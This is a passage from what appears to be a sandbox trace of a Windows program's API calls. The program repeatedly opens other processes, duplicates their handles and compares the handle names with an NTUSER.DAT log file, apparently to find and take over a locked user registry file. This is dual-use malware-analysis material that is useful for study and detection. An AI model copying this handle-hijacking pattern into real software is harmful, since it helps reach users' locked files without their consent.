dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.859] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.860] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.860] CloseHandle (hObject=0x670) returned 1 [0152.860] CloseHandle (hObject=0x680) returned 1 [0152.860] CloseHandle (hObject=0x62c) returned 1 [0152.860] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0152.860] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.860] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.861] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.861] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.861] CloseHandle (hObject=0x670) returned 1 [0152.862] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.862] CloseHandle (hObject=0x680) returned 1 [0152.862] CloseHandle (hObject=0x62c) returned 1 [0152.862] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0152.862] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0152.862] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.862] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.862] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.863] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.863] CloseHandle (hObject=0x670) returned 1 [0152.863] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.863] CloseHandle (hObject=0x680) returned 1 [0152.863] CloseHandle (hObject=0x62c) returned 1 [0152.863] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0152.864] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.864] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.864] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.865] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.865] CloseHandle (hObject=0x670) returned 1 [0152.865] CloseHandle (hObject=0x680) returned 1 [0152.865] CloseHandle (hObject=0x62c) returned 1 [0152.865] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0152.865] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.865] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.866] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.866] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.866] CloseHandle (hObject=0x670) returned 1 [0152.866] CloseHandle (hObject=0x680) returned 1 [0152.867] CloseHandle (hObject=0x62c) returned 1 [0152.867] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0152.867] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.867] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.867] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.868] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.868] CloseHandle (hObject=0x670) returned 1 [0152.868] _wcsicmp (_Str1="\\stdole2.tlb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.868] CloseHandle (hObject=0x680) returned 1 [0152.868] CloseHandle (hObject=0x62c) returned 1 [0152.868] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0152.869] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.869] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.869] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.870] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.870] CloseHandle (hObject=0x670) returned 1 [0152.870] _wcsicmp (_Str1="\\es.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.870] CloseHandle (hObject=0x680) returned 1 [0152.870] CloseHandle (hObject=0x62c) returned 1 [0152.870] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0152.870] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.870] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.871] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.872] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.872] CloseHandle (hObject=0x670) returned 1 [0152.872] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0152.872] CloseHandle (hObject=0x680) returned 1 [0152.872] CloseHandle (hObject=0x62c) returned 1 [0152.872] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.872] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.872] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.873] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.873] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.873] CloseHandle (hObject=0x670) returned 1 [0152.873] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0152.874] CloseHandle (hObject=0x680) returned 1 [0152.874] CloseHandle (hObject=0x62c) returned 1 [0152.874] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.874] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.874] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.874] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.875] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.875] CloseHandle (hObject=0x670) returned 1 [0152.875] CloseHandle (hObject=0x680) returned 1 [0152.875] CloseHandle (hObject=0x62c) returned 1 [0152.875] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.875] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.875] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.876] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.877] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.877] CloseHandle (hObject=0x670) returned 1 [0152.877] CloseHandle (hObject=0x680) returned 1 [0152.877] CloseHandle (hObject=0x62c) returned 1 [0152.877] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.877] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.877] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.878] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.878] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.878] CloseHandle (hObject=0x670) returned 1 [0152.878] _wcsicmp (_Str1="\\etc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0152.878] CloseHandle (hObject=0x680) returned 1 [0152.879] CloseHandle (hObject=0x62c) returned 1 [0152.879] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.879] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.879] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.880] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.880] CloseHandle (hObject=0x670) returned 1 [0152.880] CloseHandle (hObject=0x680) returned 1 [0152.880] CloseHandle (hObject=0x62c) returned 1 [0152.880] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.880] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.880] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.881] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.882] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.882] CloseHandle (hObject=0x670) returned 1 [0152.882] CloseHandle (hObject=0x680) returned 1 [0152.882] CloseHandle (hObject=0x62c) returned 1 [0152.882] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.882] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.882] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.883] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.883] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.883] CloseHandle (hObject=0x670) returned 1 [0152.883] CloseHandle (hObject=0x680) returned 1 [0152.884] CloseHandle (hObject=0x62c) returned 1 [0152.884] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.884] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.884] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.885] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.885] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.885] CloseHandle (hObject=0x670) returned 1 [0152.885] CloseHandle (hObject=0x680) returned 1 [0152.885] CloseHandle (hObject=0x62c) returned 1 [0152.885] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.885] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.886] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.887] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.887] CloseHandle (hObject=0x670) returned 1 [0152.887] CloseHandle (hObject=0x680) returned 1 [0152.887] CloseHandle (hObject=0x62c) returned 1 [0152.887] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.887] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.887] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.888] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.888] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.888] CloseHandle (hObject=0x670) returned 1 [0152.888] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0152.888] CloseHandle (hObject=0x680) returned 1 [0152.889] CloseHandle (hObject=0x62c) returned 1 [0152.889] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.889] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.889] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.889] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.890] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.890] CloseHandle (hObject=0x670) returned 1 [0152.890] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0152.890] CloseHandle (hObject=0x680) returned 1 [0152.890] CloseHandle (hObject=0x62c) returned 1 [0152.890] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.890] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.890] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.891] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.891] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.892] CloseHandle (hObject=0x670) returned 1 [0152.892] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0152.892] CloseHandle (hObject=0x680) returned 1 [0152.892] CloseHandle (hObject=0x62c) returned 1 [0152.892] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.892] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x268, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.892] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.893] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.893] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.893] CloseHandle (hObject=0x670) returned 1 [0152.893] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0152.893] CloseHandle (hObject=0x680) returned 1 [0152.893] CloseHandle (hObject=0x62c) returned 1 [0152.894] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.894] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.894] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.895] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.896] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.896] CloseHandle (hObject=0x670) returned 1 [0152.896] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0152.896] CloseHandle (hObject=0x680) returned 1 [0152.896] CloseHandle (hObject=0x62c) returned 1 [0152.896] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.896] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x274, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.896] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.897] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.897] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.897] CloseHandle (hObject=0x670) returned 1 [0152.898] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0152.898] CloseHandle (hObject=0x680) returned 1 [0152.898] CloseHandle (hObject=0x62c) returned 1 [0152.898] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.898] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.898] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.899] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.899] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.899] CloseHandle (hObject=0x670) returned 1 [0152.899] CloseHandle (hObject=0x680) returned 1 [0152.900] CloseHandle (hObject=0x62c) returned 1 [0152.900] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.900] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x454, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.900] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.900] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.901] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.901] CloseHandle (hObject=0x670) returned 1 [0152.901] CloseHandle (hObject=0x680) returned 1 [0152.901] CloseHandle (hObject=0x62c) returned 1 [0152.901] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.901] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.902] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.902] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.902] CloseHandle (hObject=0x670) returned 1 [0152.902] CloseHandle (hObject=0x680) returned 1 [0152.902] CloseHandle (hObject=0x62c) returned 1 [0152.902] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.903] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.903] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.903] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.904] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.904] CloseHandle (hObject=0x670) returned 1 [0152.904] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0152.904] CloseHandle (hObject=0x680) returned 1 [0152.904] CloseHandle (hObject=0x62c) returned 1 [0152.904] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0152.904] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x570, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.904] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.905] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.906] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.906] CloseHandle (hObject=0x670) returned 1 [0152.906] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0152.906] 